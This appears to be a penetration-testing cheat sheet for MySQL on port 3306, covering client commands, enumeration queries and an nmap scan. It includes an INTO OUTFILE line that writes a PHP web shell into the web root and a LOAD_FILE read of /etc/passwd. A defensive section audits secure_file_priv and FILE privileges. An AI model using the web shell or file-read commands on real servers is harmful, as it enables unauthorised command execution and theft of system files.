MYSQL - 3306

  • MySQL default system schemas/databases:

    • mysql - is the system database that contains tables that store information required by the MySQL server

    • information_schema - provides access to database metadata

    • performance_schema - is a feature for monitoring MySQL Server execution at a low level

    • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

| Command | Description |
|---|---|
| `mysql -u <user> -p<password> -h <IP address>` | Connect to the MySQL server. There should not be a space between the '-p' flag and the password. |
| `show databases;` | Show all databases. |
| `use <database>;` | Select one of the existing databases. |
| `show tables;` | Show all available tables in the selected database. |
| `show columns from <table>;` | Show all columns in the selected table. |
| `select * from <table>;` | Show everything in the desired table. |
| `select * from <table> where <column> = "<string>";` | Search for the needed string in the desired table. |

Interaction with the MySQL Server

# mysql - Linux

# Connecting to MySQL Server using valid creds
mysql -u root -pP4SSw0rd -h ip

# After Connecting, Some useful commands
show databases;
select version();
use mysql;
show tables;
# Hosts and the number of distinct users seen from each (view in the sys schema)
select host, unique_users from sys.host_summary;

# mysql.exe - Windows
C:\> mysql.exe -u username -pPassword123 -h ip

# MySQL - Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

# MySQL - Secure File Privileges
show variables like "secure_file_priv";

# MySQL - Read Local Files in MySQL
select LOAD_FILE("/etc/passwd");
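
A defender-side check for the two file operations above (`INTO OUTFILE` and `LOAD_FILE`), added here as an example and not part of the original notes: it interprets `secure_file_priv` and lists the accounts that hold the global `FILE` privilege. The account name in the commented `REVOKE` is a hypothetical placeholder.

```sql
-- Added example (not from the original page): audit the settings that decide
-- whether SELECT ... INTO OUTFILE and LOAD_FILE() can touch the filesystem.
-- Run as an administrative account so that all grantees are listed.

-- 1. Interpret secure_file_priv. The variable is read-only at runtime; it is
--    set in the server option file or on the mysqld command line.
SELECT
  @@GLOBAL.secure_file_priv AS secure_file_priv,
  CASE
    WHEN @@GLOBAL.secure_file_priv IS NULL
      THEN 'NULL: import and export operations are disabled'
    WHEN @@GLOBAL.secure_file_priv = ''
      THEN 'EMPTY: no directory restriction (any path the mysqld OS user can reach)'
    ELSE CONCAT('RESTRICTED: only files under ', @@GLOBAL.secure_file_priv)
  END AS meaning;

-- 2. Accounts holding the global FILE privilege, which both operations require.
SELECT grantee, is_grantable
FROM information_schema.user_privileges
WHERE privilege_type = 'FILE'
ORDER BY grantee;

-- 3. Remove FILE from accounts that do not need it.
--    'app_user'@'%' is a hypothetical account name used for illustration.
-- REVOKE FILE ON *.* FROM 'app_user'@'%';
```

An empty `secure_file_priv` combined with `FILE` granted to an application account is the combination to look for; either a `NULL` or directory-restricted value, or removing the privilege, closes it.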

Nmap

# Scanning MySQL Server
nmap ip -sV -sC -p3306 --script "mysql*"
